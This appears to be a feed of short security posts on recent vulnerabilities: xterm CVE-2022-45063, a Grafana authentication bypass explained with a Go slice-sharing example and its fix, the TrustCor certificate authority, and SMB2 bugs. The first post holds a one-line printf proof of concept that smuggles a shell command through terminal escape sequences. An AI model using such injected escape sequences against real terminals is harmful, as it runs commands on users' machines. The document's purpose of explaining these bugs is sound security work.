Terminal emulation bugs are the best: https://www.openwall.com/lists/oss-security/2022/11/10/1
printf "\e]50;i\$(touch /tmp/hack-like-its-1999)\a\e]50;?\a" > cve-2022-45063
Yesterday's Grafana authentication bypass vulnerability (CVE-2022-39328) is really neat from the perspective of auditing Go code. Concurrent requests could accidentally share the same array slice of middleware handlers. Advisory at https://grafana.com/blog/2022/11/08/security-release-new-versions-of-grafana-with-critical-and-moderate-fixes-for-cve-2022-39328-cve-2022-39307-and-cve-2022-39306/ and actual patch diff at https://github.com/grafana/grafana/pull/58458/files
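The slice-sharing hazard that post describes, shown in its general Go form as an added example (this is not Grafana's code or the patch; `Handler`, `chainShared`, `chainCopied` and the handler names are hypothetical). It assumes the usual cause of such sharing: `append` onto a base slice that still has spare capacity.

```go
package main

import "fmt"

// Handler stands in for an HTTP middleware; its return value names it.
type Handler func() string

func named(n string) Handler { return func() string { return n } }

// chainShared is the risky pattern: append onto a shared base slice. When base
// has spare capacity, append writes into base's backing array in place.
func chainShared(base []Handler, extra Handler) []Handler {
	return append(base, extra)
}

// chainCopied caps capacity at len with a three-index slice, so append must
// allocate a fresh backing array for every caller.
func chainCopied(base []Handler, extra Handler) []Handler {
	return append(base[:len(base):len(base)], extra)
}

// names runs each handler and collects the names in chain order.
func names(hs []Handler) []string {
	out := make([]string, 0, len(hs))
	for _, h := range hs {
		out = append(out, h())
	}
	return out
}

// demo derives two per-request chains from one base (constructed sample data)
// and returns what each request would execute.
func demo(build func([]Handler, Handler) []Handler) (reqA, reqB []string) {
	base := make([]Handler, 0, 4) // len 2 after the append below, cap 4
	base = append(base, named("log"), named("recover"))
	a := build(base, named("requireAuth")) // protected route
	b := build(base, named("noAuth"))      // public route, built second
	return names(a), names(b)
}

func main() {
	a, b := demo(chainShared)
	fmt.Println("shared:", a, b) // request A lost its auth handler
	a, b = demo(chainCopied)
	fmt.Println("copied:", a, b)
}
```

When the two chains are built from concurrent goroutines instead of sequentially, the same overwrite is a data race, which Go's race detector (`go test -race`) reports.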
Some scary reporting from @joesephmenn@twitter.com via The Post: One of the powerful root certificate authorities trusted by big web browsers to vouch for websites operates from a UPS Store address and has ties to a U.S. intelligence contractor selling interception gear: https://www.washingtonpost.com/technology/2022/11/08/trustcor-internet-addresses-government-connections/ #TrustCor #TLS
some (lol) 0-day for fun; we accidentally dropped some big bugs in https://www.runzero.com/blog/smb2-sessions/ .. 2 years - but apple is now patching it, so it's ok (and don't mind samba or windows)
Copyright 1998-2025 HD Moore